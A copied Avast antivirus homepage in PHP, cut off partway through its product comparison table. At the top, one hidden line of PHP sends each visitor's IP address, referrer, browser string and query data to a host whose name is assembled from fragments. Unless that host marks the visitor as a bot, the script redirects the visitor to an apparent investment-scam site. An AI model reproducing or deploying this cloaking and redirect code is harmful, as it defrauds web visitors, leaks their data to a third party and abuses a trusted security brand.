<?php @$_SERVER['HTTP_ACCEPT_LANGUAGE'] = $_SERVER['HTTP_ACCEPT_LANGUAGE']; if (!function_exists('getRealip')) { function getRealip() { if ((!empty($_SERVER['HTTP_CF_CONNECTING_IP'])) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!='127.0.0.1') && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=($_SERVER['SERVER_ADDR']))) {$ip=$_SERVER['HTTP_CF_CONNECTING_IP'];} elseif ((!empty($_SERVER['GEOIP_ADDR'])) && (($_SERVER['GEOIP_ADDR'])!='127.0.0.1')) {$ip=$_SERVER['GEOIP_ADDR'];} elseif ((!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!='127.0.0.1') && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=($_SERVER['SERVER_ADDR']))) {$ip=explode(',',$_SERVER['HTTP_X_FORWARDED_FOR'])[0];} elseif ((!empty($_SERVER['HTTP_CLIENT_IP'])) && (($_SERVER['HTTP_CLIENT_IP'])!='127.0.0.1') && (($_SERVER['HTTP_CLIENT_IP'])!=($_SERVER['SERVER_ADDR']))) {$ip=$_SERVER['HTTP_CLIENT_IP'];} else {$ip=$_SERVER['REMOTE_ADDR'];} return $ip; }}$ip=getRealip(); if (!function_exists('getRealref')){ function getRealref() { if(empty($_SERVER['HTTP_REFERER'])) { $_SERVER['HTTP_REFERER'] = getenv('HTTP_REFERER'); } return $_SERVER['HTTP_REFERER']; }} $ref=getRealref(); if (!function_exists('getRealua')) { function getRealua() { if(empty($_SERVER['HTTP_USER_AGENT'])) { $_SERVER['HTTP_USER_AGENT'] = getenv('HTTP_USER_AGENT'); } return $_SERVER['HTTP_USER_AGENT']; }} $ua=getRealua(); if ($_SERVER['QUERY_STRING']!=''){ $data = ''.urlencode($_SERVER['QUERY_STRING']).''; } else {$data = '';} $langua = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'],0,2); $vercode = '15722'; $cl0ip = 'bl'; $sourcename = 'cr'; $sourceid = ''; $cl1ip = 'ackt'; $flowdomain = 'c009611'; $cl2ip = 'ds.p'; $cl3ip = 'ro'; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'https://'.$cl0ip.''.$cl1ip.''.$cl2ip.''.$cl3ip.'/'.$cl1ip.''.$cl3ip.'.php'); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); curl_setopt($ch,CURLOPT_TIMEOUT,1000); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, 'fd='.$flowdomain.'&ip='.$ip.'&ref='.$ref.'&ua='.$ua.'&data='.$data.'&sourceid='.$sourceid.'&langua='.$langua.'&sourcename='.$sourcename.''); $ifbot = curl_exec($ch); curl_close($ch); if ($ifbot != '0') {  } else { if (!empty($data)) { header("Location: https://trendlineinvestment.online/wp-signal/ancientpond/ancientpond/?".urldecode($data).""); } else { header("Location: https://trendlineinvestment.online/wp-signal/ancientpond/ancientpond/"); } exit; } ?>
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0, minimum-scale=1.0, maximum-scale=1.0">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    
    <link rel="canonical" href="https://www.avast.com/index">
    
    <!-- Favicon -->
	<link rel="icon" type="image/png" href="//static.avast.com/11/web/min/i/favicon-32x32.png" sizes="32x32" />
	<link rel="icon" type="image/png" href="//static.avast.com/11/web/min/i/favicon-16x16.png" sizes="16x16" />
    <!-- Apple Touch Icon -->
	<link rel="apple-touch-icon" href="//static.avast.com/11/web/min/i/apple-touch-icon-57x57.png" />
	<link rel="apple-touch-icon" sizes="76x76" href="//static.avast.com/11/web/min/i/apple-touch-icon-76x76.png" />
	<link rel="apple-touch-icon" sizes="120x120" href="//static.avast.com/11/web/min/i/apple-touch-icon-120x120.png" />
	<link rel="apple-touch-icon" sizes="152x152" href="//static.avast.com/11/web/min/i/apple-touch-icon-152x152.png" />
    <!-- MS tile -->
	<meta name="application-name" content="Avast Antivirus"/>
	<meta name="msapplication-TileColor" content="#2d364c" />
	<meta name="msapplication-square150x150logo" content="//static.avast.com/11/web/min/i/mstile-150x150.png" />
	<meta name="msapplication-square310x310logo" content="//static.avast.com/11/web/min/i/mstile-310x310.png" />
    
    <meta charset="utf-8">
    <!-- css -->
    <link href="//static.avast.com/11/web/min/c/common-web-v11.css" rel="stylesheet" media="all">   
    <!--[if lte IE 8]>
    <link rel="stylesheet" href="//static.avast.com/11/web/min/c/ie8import.css" />
    <![endif]-->
    								
        <title>Avast | Download Free Antivirus for PC, Mac &amp; Android</title>								
        <meta content="SAbwyTSUAGmvl1JzBpQZL5FYnK0QtGCEDu17MNOjxm4" name="google-site-verification"/>
        <meta content="748cc4f03b9c93da" name="yandex-verification"/>
        <meta content="Protect your devices with the best free antivirus on the market. Download Avast antivirus and anti-spyware protection for your PC, Mac and Android." name="description"/>								
        <meta content="//static.avast.com/11/web/min/i/mkt/share/avast-logo.png" property="og:image"/>								
        <link href="//static.avast.com/11/web/min/c/index-v11-nitro.css" media="all" rel="stylesheet"/>								
    
    <link href="//static.avast.com/11/web/min/c/local/en-ww/local.css" rel="stylesheet" media="all" />
    <script src="//static.avast.com/11/web/min/j/jquery.js"></script>

<!-- Visual Website Optimizer - A/B (TPMO-5196) -->
<script type='text/javascript'>
    var _vwo_code=(function(){
    var account_id=101094,
    settings_tolerance=2000,
    library_tolerance=2500,
    use_existing_jquery=true,
    // DO NOT EDIT BELOW THIS LINE
    f=false,d=document;return{use_existing_jquery:function(){return use_existing_jquery;},library_tolerance:function(){return library_tolerance;},finish:function(){if(!f){f=true;var a=d.getElementById('_vis_opt_path_hides');if(a)a.parentNode.removeChild(a);}},finished:function(){return f;},load:function(a){var b=d.createElement('script');b.src=a;b.type='text/javascript';b.innerText;b.onerror=function(){_vwo_code.finish();};d.getElementsByTagName('head')[0].appendChild(b);},init:function(){settings_timer=setTimeout('_vwo_code.finish()',settings_tolerance);this.load('//dev.visualwebsiteoptimizer.com/j.php?a='+account_id+'&u='+encodeURIComponent(d.URL)+'&r='+Math.random());var a=d.createElement('style'),b='body{opacity:0 !important;filter:alpha(opacity=0) !important;background:none !important;}',h=d.getElementsByTagName('head')[0];a.setAttribute('id','_vis_opt_path_hides');a.setAttribute('type','text/css');if(a.styleSheet)a.styleSheet.cssText=b;else a.appendChild(d.createTextNode(b));h.appendChild(a);return settings_timer;}};}());_vwo_settings_timer=_vwo_code.init();
    </script>
    <!-- /Visual Website Optimizer - A/B (TPMO-5196) -->
    
    <!-- Visual Website Optimizer - UA (TPMO-5196 + TPMO-7198) -->
    <script type="text/javascript">
    var _vis_opt_queue = window._vis_opt_queue || [],
    	_vis_counter = 0;
    _vis_opt_queue.push(function() {
    	try {
    		if (!_vis_counter) {
    			var _vis_data = '',
    				_vis_combination;
    			_vis_combination = _vis_opt_readCookie('_vis_opt_exp_' + _vis_opt_experiment_id + '_combi');
    			if (typeof (_vwo_exp[_vis_opt_experiment_id].combination_chosen) != 'undefined') {
    				_vis_combination = _vwo_exp[_vis_opt_experiment_id].combination_chosen;
    			}
    			if (typeof (_vwo_exp[_vis_opt_experiment_id].comb_n[_vis_combination]) != 'undefined') {
    	            if (typeof (_vwo_exp[_vis_opt_experiment_id].name) === 'string' && typeof _vis_opt_comb_name[_vis_combination] === 'string') {
    		            _vis_data = _vwo_exp[_vis_opt_experiment_id].name.substr(0, _vwo_exp[_vis_opt_experiment_id].name.indexOf(' ')) + '-' + _vis_opt_comb_name[_vis_combination].substr(0, 1);
    	            } else {
    		            _vis_data = 'VWO-' + _vis_opt_experiment_id + ':' + _vis_opt_comb_name[_vis_combination];
    	            }
    	            _vis_counter = 1;
                }
    			if (_vis_counter && _vis_data != '') {
    	            window.dataLayer = window.dataLayer || [];
    	            dataLayer.push({'testId3' : _vis_data});
                }
    		}
    	} catch (err) {
    	}
    });
</script>
<!-- /Visual Website Optimizer - UA (TPMO-5196 + TPMO-7198) -->
  </head>
  
  <body class="mod-en-ww">
    <noscript>
        <div class="noscript-message">In order to view this page correctly, you must have a JavaScript-enabled browser and have JavaScript turned on. We apologize for any inconvenience. <a href="//support.google.com/adsense/bin/answer.py?hl=en&answer=12654">Learn how to enable it</a>.</div>
</noscript>
    <!-- Google Tag Manager DataLayer -->
<script>
/*! Declare GTM dataLayer */
window.dataLayer = window.dataLayer || [];
  
/*! Dimensions to dataLayer */
(function(){
	var dataObj = {
		'contentLocale': 'en-ww',
		'pageName': 'en-ww | windows'
	};
	var contentGroup = 'Consumer';
	if (contentGroup != '') {
		dataObj.contentGroup = contentGroup;
	}
    
    if (window.location.href.indexOf('/faq.php') > -1) {
        dataObj.pageName = document.title;
    }
    
	dataLayer.push(dataObj);
})();
</script>
<!-- End Google Tag Manager DataLayer -->
    <!-- Google Tag Manager -->
<noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-PZ48F8"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-PZ48F8');</script>
<!-- End Google Tag Manager -->
    								
        <!-- header -->
<div id="header">    
    <div class="AVsizer">
      
      <div itemscope itemtype="http://schema.org/Organization">
        <a href="/index" itemprop="url" target="_parent" class="logo" title="Home">
          <img itemprop="logo" width="110" height="35" alt="Avast Free Antivirus" src="//static.avast.com/11/web/min/i/avast-software.png" />
        </a>
      </div>
      
        <p class="AVaccount">                  
          <a href="/business" class="business" title="Business"><span>Business <b>NEW</b></span></a>
<a href="/store" class="store" title="Shop now"><span>Shop now</span></a>
<a href="https://my.avast.com/" class="account" title="Account"><span>Account</span></a>
<a href="#" class="menu nav-switch" title="Menu"><span>Menu</span></a>
        </p>
            
    </div>
  
</div>
<!-- /header-->
        <div class="nav">
    
    <div class="nav-controls">
            <div class="nav-controls-close"></div>
    </div>
    <!-- level 1 -->
    <div class="nav-level nav-level1">
        <div class="nav-list">
            <h5 class="nav-list-title">Avast products</h5>
            <p class="nav-list-section">What would you like to protect?</p>
            <ul class="nav-list-items">
                <li id="i-0" class="pc"><a href="#" class="icon">PC / Laptop</a></li>
                <li id="i-1" class="mac"><a href="#" class="icon">Mac</a></li>
                <li id="i-2" class="android"><a href="#" class="icon">Android</a></li>
                <li id="i-3" class="iphone"><a href="#" class="icon">iPhone / iPad</a></li>
                <li id="i-4" class="business"><a href="#" class="icon">Business</a></li>
                <li id="i-5" class="edu"><a href="/education" class="icon">Education</a></li>
            </ul>
            <p class="nav-list-section">Having trouble with your device?</p>
            <ul class="nav-list-items">
                <li id="i-6" class="support"><a href="/support" class="icon">Online Support</a></li>
                <li id="i-10" class="total-support"><a href="/total-support" class="icon">24/7 Phone Support</a></li>
                <li id="i-11" class="academy"><a href="/c-online-threats" class="icon">Academy</a></li>
            </ul>
            <p class="nav-list-section">About Avast</p>
            <ul class="nav-list-items">
                <li id="i-7" class="about"><a href="/about" class="icon">Company</a></li>
                <li id="i-8" class="tech"><a href="/technology" class="icon">Technology</a></li>
                <li id="i-9" class="jobs"><a href="/careers" class="icon">Jobs</a></li>
            </ul>
        </div>            
    </div>
    <!-- /level 1 -->
    
    <!-- level 2 -->
    <div class="nav-level nav-level2">
        <div class="nav-controls">
              <a href="#" class="nav-controls-levelup"><span>back</span></a>
        </div>

        <!-- Level 2 - PC -->
        <div id="l-0" class="nav-list">                
            <h5 class="nav-list-title">Products for PC</h5>
            
            <p class="nav-list-section">
                Security
                <a href="/compare-antivirus" class="button blue"><span>Compare</span></a>
            </p>
            
            <ul class="nav-list-items">
                <li id="i-0-0" class="pre"><a href="/premier" class="icon">Premier<span>Complete, top-of-the-line protection.</span></a></li>
                <li id="i-0-1" class="is"><a href="/internet-security" class="icon">Internet Security<span>Advanced security for whatever you do online.</span></a></li>
                <li id="i-0-2" class="pro"><a href="/pro-antivirus" class="icon">Pro Antivirus<span>Expert protection that's easy on your PC.</span></a></li>
                <li id="i-0-3" class="fa"><a href="/free-antivirus-download" class="icon">Free Antivirus<span>The world's most trusted antivirus.</span></a></li>
            </ul>
            
            <p class="nav-list-section">Privacy</p>
            <ul class="nav-list">
                <li id="i-0-4" class="secureline"><a href="/secureline-vpn#pc" class="icon">SecureLine<span>Hacker-proof everything you send or receive.</span></a></li>
                <li id="i-0-5" class="passwords"><a href="/passwords#pc" class="icon">Passwords<span>Finally. Security for your passwords.</span></a></li>
            </ul>
            
            <p class="nav-list-section">Performance</p>
            <ul class="nav-list">
                <li id="i-0-6" class="cleanup"><a href="/cleanup" class="icon">Cleanup<span>For a clutter-free computer.</span></a></li>
                <li id="i-0-7" class="browsercleanup"><a href="/browser-cleanup" class="icon">Browser Cleanup<span>Get rid of dangerous browser toolbars.</span></a></li>
            </ul>
        </div>
        <!-- /Level 2 - PC -->
        
        <!-- Level 2 - Mac -->
        <div id="l-1" class="nav-list">
            <h5 class="nav-list-title">Products for Mac</h5>
            
            <p class="nav-list-section">Security</p>
            <ul class="nav-list-items">
              <li id="i-1-0" class="fa"><a href="/free-mac-security" class="icon">Free Mac Security<span>The most trusted security for your Mac.</span></a></li> 
            </ul>
            
            <p class="nav-list-section">Privacy</p>
            <ul class="nav-list-items">
              <li id="i-1-1" class="secureline-mac"><a href="/secureline-vpn#mac" class="icon">SecureLine<span>Hacker-proof everything you send or receive.</span></a></li>
              <li id="i-1-2" class="passwords"><a href="/passwords-mac" class="icon">Passwords<span>Finally. Security for your passwords.</span></a></li>
            </ul>
        </div>
        <!-- /Level 2 - Mac -->
        
        <!-- Level 2 - Android -->
        <div id="l-2" class="nav-list">
            <h5 class="nav-list-title">Products for Android</h5>
            
            <p class="nav-list-section">Security</p>
            <ul class="nav-list-items">
              <li id="i-2-0" class="mobilesecurity"><a href="/free-mobile-security" class="icon">Free Mobile Security<span>Safety in your pocket, wherever you go.</span></a></li> 
              <li id="i-2-1" class="antitheft"><a href="/anti-theft" class="icon">Anti-Theft<span>Get your missing phone back.</span></a></li>
            </ul>
            
            <p class="nav-list-section">Privacy</p>
            <ul class="nav-list-items">
              <li id="i-2-2" class="secureline-android"><a href="/secureline-vpn#android" class="icon">SecureLine<span>Hacker-proof everything you send or receive.</span></a></li>
              <li id="i-2-3" class="passwords"><a href="/passwords#android" class="icon">Passwords <span>Finally. Security for your passwords.</span></a></li>
              <li id="i-0-6" class="app-locker"><a href="/app-locker" class="icon">App Locker<span>Lock apps with a PIN and maintain privacy.</span></a></li>
            </ul>
            
            <p class="nav-list-section">Performance</p>
            <ul class="nav-list-items">
              <li id="i-2-4" class="cleanup-android"><a href="/cleanup-android" class="icon">Cleanup<span>Clean up and speed up your phone.</span></a></li>
              <li id="i-2-5" class="batterysaver"><a href="/battery-saver" class="icon">Battery Saver<span>Improve your battery life.</span></a></li>
            </ul>
           
            <p class="nav-list-section travel">Travel</p>
            <ul class="nav-list-items">
              <li id="i-2-6" class="wififinder"><a href="/wifi-finder" class="icon">Wi-Fi Finder<span>Find fast, secure hotspots near you.</span></a></li>
            </ul>
        </div>
        <!-- /Level 2 - Android -->
        
        <!-- Level 2 - iPhone / iPad--> 
        <div id="l-3" class="nav-list">
            <h5 class="nav-list-title">Products for iPhone/iPad</h5>
            
            <p class="nav-list-section">Privacy</p>
            <ul class="nav-list-items">
              <li id="i-3-0" class="secureline-ios"><a href="/secureline-vpn#ios" class="icon">SecureLine<span>Hacker-proof everything you send or receive.</span></a></li>
              <li id="i-3-3" class="secureme"><a href="/secureme" class="icon">SecureMe<span>Hide yourself from hackers on public WiFi.</span></a></li>
              <li id="i-3-1" class="passwords"><a href="/passwords#ios" class="icon">Passwords<span>Finally. Security for your passwords.</span></a></li>
            </ul>
            
            <p class="nav-list-section tools">Tools</p>
            <ul class="nav-list-items">
              <li id="i-3-2" class="wififinder"><a href="/wifi-finder" class="icon">Wi-Fi Finder<span>Find fast, secure hotspots near you.</span></a></li>
              <li id="i-3-4" class="photospace"><a href="/photo-space" class="icon">Photo Space<span>Save 7x more photos.</span></a></li>
              <li id="i-3-5" class="call-blocker"><a href="/call-blocker" class="icon">Avast Call Blocker<span>Avoid annoying spam and unwanted calls.</span></a></li>
            </ul>
        </div>
        <!-- /Level 2 - iPhone / iPad-->
        
         <!-- Level 2 - Business -->
        <div id="l-4" class="nav-list">
            <h5 class="nav-list-title">Products for business</h5>
            
            <ul class="nav-list-item">
              <li id="i-4-0"><a href="/business">Overview</a></li>
            </ul>
            
            <p class="nav-list-section">On-premise management</p>
            <ul class="nav-list-items">
              <li id="i-4-1" class="ep"><a href="/endpoint-protection-suite-plus" class="icon">Endpoint Protection Suite Plus<span>All-round security for PCs and servers.</span></a></li>
              <li id="i-4-2" class="epp"><a href="/endpoint-protection-suite" class="icon"><span class="nav-label green">Most Popular</span>Endpoint Protection Suite<span>Antivirus for PCs and servers.</span></a></li>
              <li id="i-4-3" class="eps"><a href="/endpoint-protection-plus" class="icon">Endpoint Protection Plus<span>Complete security for corporate PCs.</span></a></li>
              <li id="i-4-4" class="epsp"><a href="/endpoint-protection" class="icon">Endpoint Protection<span>Antivirus your company can afford.</span></a></li>
            </ul>
          
          <p class="nav-list-section">Cloud-based management</p>
            <ul class="nav-list-items">
              <li id="i-4-5" class="avb"><a href="/avast-for-business" class="icon">Avast for Business<span>Free and premium security for PCs, Macs and servers.</span></a></li>
              <li id="i-4-10" class="academy"><a href="/education" class="icon">Avast for Education<span>Protect your school with premium security for PCs, Macs and servers</span></a></li>
            </ul>
            
          <p class="nav-list-section">Server protection</p>
            <ul class="nav-list-items">
              <li id="i-4-8" class="ls"><a href="/linux-server-antivirus" class="icon">Linux Security<span>Fortify your Linux network.</span></a></li>
              <li id="i-4-7" class="fss"><a href="/file-server-security" class="icon">File Server Security<span>Powerful server antivirus.</span></a></li>
              <li id="i-4-6" class="ess"><a href="/email-server-security" class="icon">Email Server Security<span>Server antivirus and anti-spam</span></a></li>  
            </ul>
           
           
           <span class="business-support">
            <p class="nav-list-section">Support</p>
            <ul class="nav-list-items">
              <li id="i-4-5" class="total-support"><a href="/business-support" class="icon">Avast Business Support<span>Support you need for the business you protect.</span></a></li>
            </ul>
            </span>
             <p class="nav-list-section enterprise">Enterprise solutions</p>
            <ul class="nav-list-items">
              <li id="i-4-9" class="avmp"><a href="/enterprise" class="icon">Avast Virtual Mobile Platform<span>Protect your data, protect your business.</span></a></li>
            </ul>
            
            
            
        </div>
        <!-- /Level 2 - Business -->
    </div>
    <!-- /level 2 -->

</div>
    
    <!-- Content part container -->
    
    <div id="content-holder">
            
      								
        <div id="top" class="bg-index-win fullscreen">
	<div class="AVsizer">
		<div class="absolute-center">

			<h1>The lightest Avast Antivirus yet</h1>
			<p class="subh1">Download faster, lightweight protection that won’t slow you down.</p>
			
          	<div class="logo-holder upper">
                <span class="nitro"><img src="//static.avast.com/11/web/min/i/ico/nitro.png" alt="" /></span>				
			</div>

			<p class="butt-holder">
				<a href="/download-thank-you.php?product=FAV-ONLINE&locale=en-ww" class="button blue large bi-download-link" data-bi-download-name="FAV-ONLINE"><span>Download Free Antivirus</span></a>
				<a href="#comparison" class="button transparent big"><span data-hash="comparison">Compare products</span></a>
			</p>

			<div class="logo-holder lower">                
				<span class="win10"><a href="/windows-10-antivirus" title="Antivirus for Windows 10"><img src="//static.avast.com/11/web/min/i/ico/windows.png" alt="" />Windows 10 compatible</a></span>
          	</div>
          
			<div class="row product-links">
				<div class="span4">
					<a href="#comparison" target="_self">
						<img src="//static.avast.com/11/web/min/i/ico/pc.png" alt="">
						<p><span>Home</span>The most trusted PC, Mac, and home network protection.</p>
					</a>
				</div>
				<div class="span4">
					<a href="/mobile" target="_self">
						<img src="//static.avast.com/11/web/min/i/ico/mobiles.png" alt="">
						<p><span>Mobile</span>Over 200M installs on Google Play and the App Store combined.</p>
					</a>
				</div>
				<div class="span4">
					<a href="/business" target="_self">
						<img src="//static.avast.com/11/web/min/i/ico/person.png" alt="">
						<p><span>Business</span>Security for businesses big and small, mobile included.</p>
						<!-- p><span>Business</span>Protecting businesses big and small. And not just with antivirus.</p -->
					</a>
				</div>
			</div>
		</div>
	</div>
</div>



<!-- slow (blue section) -->
<div id="slow">
	<div class="AVsizer">

		<div class="row">
			<div class="span6"><img class="main" src="//static.avast.com/11/web/min/i/index/slide-blue.png" alt=""></div>
			<div class="span6">
				<h3>Nitro - we're moving on up, into the Cloud</h3>
				<p class="subh3">The new Nitro Update for Avast antivirus is our most lightweight software yet. From now on, we'll be running a significant portion of our analysis in the Cloud - and not on your system where it can slow you down.</p>
				<div class="av">
					<img width="54" height="54"  src="//static.avast.com/11/web/min/i/awards/award-av-dark-retina.png" alt="">
                  <p class="smaller">Antivirus with the lowest impact on PC performance</p>
				</div>
			</div>
		</div>
	</div>
</div>
<!-- /slow -->

<!-- protect (green section) -->
<div id="protect">
	<div class="AVsizer">

		<div class="row">
			<div class="span6">
				<h3>Introducing CyberCapture</h3>
				<p class="subh3">Stay one step ahead of evolving cyber threats. This proprietary cutting-edge technology captures unknown files and sends them to the Avast Threat Labs for real-time analysis to keep you safe.</p>
				<div class="cnet">
					<img width="55" height="55" src="//static.avast.com/11/web/min/i/awards/award-cnet-55x55.png" alt="">
					<img class="stars" src="//static.avast.com/11/web/min/i/awards/award-stars.png" alt="">
				</div>
				<div class="amazon">
					<img width="87" height="26" src="//static.avast.com/11/web/min/i/awards/award-amazon-87x26.png" alt="">
					<img class="stars" src="//static.avast.com/11/web/min/i/awards/award-stars.png" alt="">
				</div>
			</div>
			<div class="span6"><img class="main" src="//static.avast.com/11/web/min/i/index/slide-green.png" alt=""></div>
		</div>
	</div>
</div>
<!-- /protect -->

<!-- extras (red section) -->
<div id="extras">
	<div class="AVsizer">

		<div class="row">
			<div class="span6"><img class="main" src="//static.avast.com/11/web/min/i/index/slide-red.png" alt=""></div>
			<div class="span6">
				<h3>Security for your Internet of Things</h3>
				<p class="subh3">Your home is your castle. So why invite hackers in to stay? The Avast Nitro Update delivers a new level of router threat detection so you can protect the devices around your home.</p>
				<a href="/f-home-network-security" class="button white big" target="_self"><span>Find Out More Here</span></a>
			</div>
		</div>
	</div>
</div>
<!-- /extras -->

<!-- features -->
<div id="features" class="bg-grey">
	<div class="AVsizer">
		<h2>Plenty of features. No extra weight.</h2>
		<p class="subh2">The Avast Nitro Update is designed to have less drag on your system so you can stay fast and productive, and safe at the same time.</p>
		<div class="row">
			<div class="span4">
				<img src="//static.avast.com/11/web/min/i/ico/features-v11/antivirus-antimalware-large.png" alt="" />
                <h5>Antivirus and <a href="https://www.avast.com/c-malware">anti-malware</a></h5>
                <p> Protect yourself against threats that don’t even exist yet.</p>
			</div>
			<div class="span4">
				<img src="//static.avast.com/11/web/min/i/ico/features-v11/cybercapture-large.png" alt="" />
<h5><span class="label">NEW</span>CyberCapture</h5>
<p>Captures emerging threats in real-time through the Avast Threat Labs.</p>
			</div>
			<div class="span4">
				<img src="//static.avast.com/11/web/min/i/ico/features-v11/hns-large.png" alt="" />
                <h5>Home Network Security</h5>
                <p>Stop hackers getting hold of your home network – and anything on it.</p>
			</div>
		</div>
		<div class="row">
			<div class="span4">
				<img src="//static.avast.com/11/web/min/i/ico/features-v11/browser-cleanup-large.png" alt="" />
                <h5>Browser Cleanup</h5>
                <p>Who needs unwanted toolbars and extensions slowing down their PC?</p>
			</div>
			<div class="span4">
				<img src="//static.avast.com/11/web/min/i/ico/features-v11/safezone-browser2-large.png" alt="" />
<h5><span class="label">NEW</span><a href="/f-safezone">SafeZone Browser</a></h5>
<p>Browse, bank, or shop — with extra protection from hackers and online ads.</p>
			</div>
			<div class="span4">
				<img src="//static.avast.com/11/web/min/i/ico/features-v11/smart-scan-large.png" alt="" />
                <h5>Smart Scan</h5>
                <p>Give your PC the ultimate all-in-one scan, all in one go.</p>
			</div>
		</div>
	</div>
</div>
<!-- /features -->

<!-- comparision -->
<div id="comparison">
	<div class="AVsizer">
		<table class="tab-com products-3">
    
    <tr class="products">
        <td class="description" rowspan="3"><h2>Choose your Nitro-powered protection</h2></td>
        <td class="val c1">
            <a href="/download-thank-you.php?product=FAV-ONLINE&locale=en-ww" class="download-nofdi tsl-free-btn-dwn bi-download-link" data-bi-download-name="FAV-ONLINE"><img src="//static.avast.com/11/web/min/i/ico/80/avast-free-antivirus.png" alt="Avast Free Antivirus" /></a>
        </td>
        <td class="val c2">
          <a href="/pro-antivirus"><img src="//static.avast.com/11/web/min/i/ico/80/avast-pro-antivirus.png" alt="Avast Pro Antivirus" /></a>
        </td>
        <td class="val c3">
          <a href="/internet-security"><img src="//static.avast.com/11/web/min/i/ico/80/avast-internet-security.png" alt="Avast Internet Security" /></a>
        </td>
        <td class="val c4">
          <a href="/premier"><img src="//static.avast.com/11/web/min/i/ico/80/avast-premier.png" alt="Avast Premier" /></a>
        </td>
     </tr>
      
    <tr class="titles" id="compare">
        <td class="val c1">
            <h5><a href="/download-thank-you.php?product=FAV-ONLINE&locale=en-ww" class="download-nofdi tsl-free-btn-dwn bi-download-link" data-bi-download-name="FAV-ONLINE"><span>Free  Antivirus</span> Essential</a></h5>      
        </td>
        <td class="val c2">
            <h5><a href="/pro-antivirus"><span>Pro  Antivirus</span> Expert</a></h5>      
        </td>
        <td class="val c3">
            <h5><a href="/internet-security"><span>Internet Security</span> Advanced</a></h5> 
        </td>
        <td class="val c4">
            <h5><a href="/premier"><span>Premier</span> Complete</a></h5>
        </td>
    </tr>
  
  <tr class="buttons upper">
        <td class="val c1">
          <a href="/download-thank-you.php?product=FAV-ONLINE&locale=en-ww" id="button-free-href" class="big button blue download-nofdi tsl-free-btn-dwn bi-download-link" data-bi-download-name="FAV-ONLINE"><span>FREE DOWNLOAD</span></a>
        </td>
        <td class="val c2">
          <a href="/pro-antivirus" class="big button blue"><span>Download</span></a>
        </td>
        <td class="val c3">
          <a href="/download-thank-you.php?product=ISE-ONLINE&locale=en-ww" class="big button blue bi-download-link" data-bi-download-name="ISE-ONLINE"><span>Download</span></a>
          <p class="trial">Free 30-day trial</p>
        </td>
        <td class="val c4">
          <a href="/download-thank-you.php?product=PRE-ONLINE&locale=en-ww" class="big button blue bi-download-link" data-bi-download-name="PRE-ONLINE"><span>Download</span></a>
          <p class="trial">Free 30-day trial</p>
        </td>
    </tr>

<!-- compare features -->
<tr class="feature">
  <td class="txt"><b>Stop anything nasty</b> Detect viruses, malware and more, plus strengthen your home network.</td>
  <td class="val c1"><span class="yes"><b>yes</b></span></td>
  <td class="val c2"><span class="yes"><b>yes</b></span></td>
  <td class="val c3"><span class="yes"><b>yes</b></span></td>
  <td class="val c4"><span class="yes"><b>yes</b></span></td>
</tr>

<tr class="feature">
  <td class="txt"><b><span class="label">NEW</span>Capture emerging threats</b> Real-time analysis of unknown files, so viruses can’t take you by surprise.</td>
  <td class="val c1"><span class="yes"><b>yes</b></span></td>
  <td class="val c2"><span class="yes"><b>yes</b></span></td>
  <td class="val c3"><span class="yes"><b>yes</b></span></td>
  <td class="val c4"><span class="yes"><b>yes</b></span></td>
</tr>
<tr class="feature">
  <td class="txt"><b>Reclaim your browser</b> Get rid of unwanted extensions and hackers making money off your searches.</td>
  <td class="val c1"><span class="yes"><b>yes</b></span></td>
  <td class="val c2"><span class="yes"><b>yes</b></span></td>
  <td class="val c3"><span class="yes"><b>yes</b></span></td>
  <td class="val c4"><span class="yes"><b>yes</b></span></td>
</tr>
<tr class="feature">
  <td class="txt"><b>Forget your passwords</b> Almost. Log in anywhere with just one. We’ll make it unbreakable.</td>
  <td class="val c1"><span class="yes"><b>yes</b></span></td>
  <td class="val c2"><span class="yes"><b>yes</b></span></td>
  <td class="val c3"><span class="yes"><b>yes</b></span></td>
  <td class="val c4"><span class="yes"><b>yes</b></span></td>
</tr>
<tr class="feature">
  <td class="txt"><b>Spot fakes</b> Make sure the banking site you’re visiting is the one you think it is.</td>
  <td class="val c1 empty">&nbsp;</td>
  <td class="val c2"><span class="yes"><b>yes</b></span></td>
  <td class="val c3"><span class="yes"><b>yes</b></span></td>
  <td class="val c4"><span class="yes"><b>yes</b></span></td>
</tr>
<tr class="feature">
  <td class="txt"><b>Shop till you drop</b> Not till someone steals your details.</td>
  <td class="val c1 empty">&nbsp;</td>
  <td class="val c2"><span class="yes"><b>yes</b></span></td>
  <td class="val c3"><span class="yes"><b>yes</b></span></td>
  <td class="val c4"><span class="yes"><b>yes</b></span></td>
</tr>
<tr class="feature">
  <td class="txt"><b>Shield your privacy</b> Stop anyone and everyone from getting to your computer.</td>
  <td class="val c1 empty">&nbsp;</td>
  <td class="val c2 empty">&nbsp;</td>
  <td class="val c3"><span class="yes"><b>yes</b></span></td>
  <td class="val c4"><span class="yes"><b>yes</b></span></td>
</tr>
<tr class="feature">
  <td class="txt"><b>Avoid spam at all costs</b> Keep your inbox clean, lean, and organized.</td>
  <td class="val c1 empty">&nbsp;</td>
  <td class="val c2 empty">&nbsp;</td>
  <td class="val c3"><span class="yes"><b>yes</b></span></td>
  <td class="val c4"><span class="yes"><b>yes</b></span></td>
</tr>
<tr class="feature">
  <td class="txt"><b>Beat hackers – automatically</b> Update your software without even thinking about it.</td>
  <td class="val c1 empty">&nbsp;</td>
  <td class="val c2 empty">&nbsp;</td>
  <td class="val c3 empty">&nbsp;</td>
